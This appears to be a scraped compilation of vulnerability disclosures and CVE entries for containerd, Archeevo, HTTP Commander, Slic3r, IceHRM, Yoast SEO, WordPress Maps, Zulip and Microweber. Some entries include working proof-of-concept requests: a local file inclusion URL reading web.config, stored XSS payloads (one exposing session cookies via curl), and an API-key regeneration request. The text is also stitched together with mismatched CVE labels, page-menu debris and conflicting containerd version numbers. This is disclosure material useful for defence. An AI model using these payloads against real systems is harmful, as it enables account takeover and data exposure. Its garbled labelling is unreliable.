containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.14.12 where containers launched through containerdâ€™s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host.  This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information.  Kubernetes and crictl can both be configured to use containerdâ€™s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12.  Users should update to these versions to resolve the issue.

**Impact**

A bug was found in containerd where containers launched through containerd’s CRI implementation with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation.

**Patches**

This bug has been fixed in containerd 1.6.1, 1.5.10 and 1.4.13. Users should update to these versions to resolve the issue.

**Workarounds**

Ensure that only trusted images are used.

**Credits**

The containerd project would like to thank Felix Wilhelm of Google Project Zero for responsibly disclosing this issue in accordance with the containerd security policy.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in containerd
*   Email us at security@containerd.io

CVE-2022-23648: Build software better, together

A stored cross-site scripting (XSS) vulnerability in the admin interface in Element-IT HTTP Commander 7.0.0 allows unauthenticated users to get admin access by injecting a malicious script in the User-Agent field.

CVE-2022-24573: Element-IT software products news

Archeevo below 5.0 is affected by local file inclusion through file=~/web.config to allow an attacker to retrieve local files.

    # Exploit Title: Archeevo 5.0 - Local File Inclusion
    # Google Dork: intitle:"archeevo"
    # Date: 01/15/2021
    # Exploit Author: Miguel Santareno
    # Vendor Homepage: https://www.keep.pt/
    # Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
    # Version: < 5.0
    # Tested on: windows
    
    # 1. Description
    
    Unauthenticated user can exploit LFI vulnerability in file parameter.
    
    
    # 2. Proof of Concept (PoC)
    
    Access a page that don’t exist like /test.aspx and then you will be redirected to
    https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
    
    After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
    /web.config file of the application.
    
    https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
    
    
    # 3. Research:
    https://miguelsantareno.github.io/MoD_1.pdf

CVE-2022-23377: Offensive Security’s Exploit Database Archive

An out-of-bounds read vulnerability exists in the GCode::extrude() functionality of Slic3r libslic3r 1.3.0 and Master Commit b1a5500. A specially crafted stl file could lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.

HackMD

*   

*   

*   

*   *   Options
    *   Versions and GitHub Sync
    *   Transfer ownership
    *   Delete this note
    *   Template
    *   Insert from template
    *   Export
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Import
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Clipboard
    *   Download
    *   Markdown
    *   HTML
    *   Raw HTML
    *   ODF (Beta)
*   *   Sharing
    
    *   View mode
        
        *   Edit mode
        *   View mode
        *   Book mode
        *   Slide mode
        
    *   Note Permission
    *   Read
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   Write
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   More (Comment, Invitee)

CVE-2021-44962: Slic3r libslic3r STL File GCode::extrude() out-of-bounds read vulnerability

A stored cross-site scripting (XSS) vulnerability in Ice Hrm 30.0.0.OS allows attackers to steal cookies via a crafted payload inserted into the First Name field.

This vulnerability was reported to the maintainers on **Nov 23rd, 2021**, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively.

An Authenticated user can set thier 'first name' to any unsanitized HTML or script.

IceHRM website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require.

    curl 'http://127.0.0.1/icehrm/app/service.php' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'sec-ch-ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"' \
      -H 'DNT: 1' \
      -H 'sec-ch-ua-mobile: ?0' \
      -H 'User-Agent: Mozilla/5.0' \
      -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
      -H 'Accept: application/json, text/javascript, */*; q=0.01' \
      -H 'X-Requested-With: XMLHttpRequest' \
      -H 'sec-ch-ua-platform: "Linux"' \
      -H 'Origin: http://127.0.0.1' \
      -H 'Sec-Fetch-Site: same-origin' \
      -H 'Sec-Fetch-Mode: cors' \
      -H 'Sec-Fetch-Dest: empty' \
      -H 'Referer: http://127.0.0.1/icehrm/app/?g=modules&&n=employees&m=modules_Personal_Information' \
      -H 'Accept-Language: en-US,en;q=0.9' \
      -H 'Cookie: PHPSESSID=p165r7jp664smtns7lh26tn6e8; tbl_session=lk93k2rif7jvprfqs05pqk41t65436nu' \
      -H 'sec-gpc: 1' \
      --data-raw 'id=2&first_name=hello%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&middle_name=&last_name=sd&nationality=2&birthday=2021-12-03&gender=Female&marital_status=Single&ssn_num=&nic_num=&other_id=&driving_license=&work_station_id=&address1=&address2=&city=&province=NULL&postal_code=&home_phone=&mobile_phone=&work_phone=&private_email=asd%40asd.com&a=add&t=Employee&content=HTML' \
      --compressed
    

#3. Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed - 'System > Users' . You'll be able to see the alert box with session cookie of 'admin' user.

The extra added `content = HTML` request parameter causes the backend to ignore sanitization of user input.

A less privileged user can take over 'admin' account by stealing the session cookie.

CVE-2022-25015: Stored XSS vulnerability in dashboard of any logged-in user · Issue #285 · gamonoid/icehrm

The Yoast SEO WordPress plugin before 17.3 discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.

CVE-2021-25118: Changeset 2608691 – WordPress Plugin Repository

The Maps Plugin using Google Maps for WordPress plugin before 1.8.4 does not have CSRF checks in most of its AJAX actions, which could allow attackers to make logged in admins delete arbitrary posts and update the plugin's settings via a CSRF attack

CVE-2021-25081

The Maps Plugin using Google Maps for WordPress plugin before 1.8.1 does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin's settings.

CVE-2021-25011

Improper Access Control in GitHub repository zulip/zulip prior to 4.10.

**Description**

According to the current design of the application, when the user wants to get value of api\_key, API /json/fetch\_api\_key will require password to authentication. However, the application exists another API routed at /json/users/me/api\_key/regenerate that allows regenerating api\_key value and doesn't requiring password authentication. Attacker who gets the user's valid session can call vulnerable API to extract the api\_key value without user's password.

**Proof of Concept****I'm using online service at https://testingnnnn.zulipchat.com.**

*   Step 1: Login as normal user, go to https://testingnnnn.zulipchat.com/#settings/account-and-privacy, click "Show/change your API key", application will ask for password to perform the action.
*   Step 2: In current session, call this request to regenerate and get value of api\_key

    POST /json/users/me/api_key/regenerate HTTP/2
    Host: testingnnnn.zulipchat.com
    Cookie: [YOUR_VALID_COOKIE]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Csrftoken: [VALID_CSRF_TOKEN]
    X-Requested-With: XMLHttpRequest
    Referer: https://testingnnnn.zulipchat.com/
    Connection: close
    
    
    

*   PoC:

Show api\_key: https://drive.google.com/file/d/1\_A7KQeoyByA3xYwIyJ1k9ZTywabwlEMM

Regenerate api\_key: https://drive.google.com/file/d/1Ob96FTju4irz2Hn2sXBXz\_JtMlEAmAp0

**Impact**

Bypass the protection mechanism in the design of the application. Attackers can get the api\_key value without knowing user's password.

CVE-2021-3967: Improper Access Control in zulip

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.

**Description**

I found a Stored XSS vulnerability at admin page: https://demo.microweber.org/demo/admin/view:settings#option\_group=files

**Proof of Concept**

    Step 1: Go to Settings > Website settings > Files
    Step 2: Create new folder with folder name : <img scr=0 onerror=alert(1)>
    
    // Request
    ---------------------------------------
    POST /demo/api/create_media_dir HTTP/1.1
    Host: demo.microweber.org
    Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Asettings%23option_group%3Dfiles; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/admin/view:settings
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1
    ---------------------------------------
    
    Step3: After create folder successful, see alert popup
    
    PoC:
    Request: https://drive.google.com/file/d/1daorHwquywP3LPh6na5PIZzWb2lEL19W/view?usp=sharing
    Alert popup: https://drive.google.com/file/d/1iTtAwQNHrpfktGHHXDrJ_7XPYlBOAHxe/view?usp=sharing
    

**Impact**

This vulnerability is capable of stored XSS

Tag

#google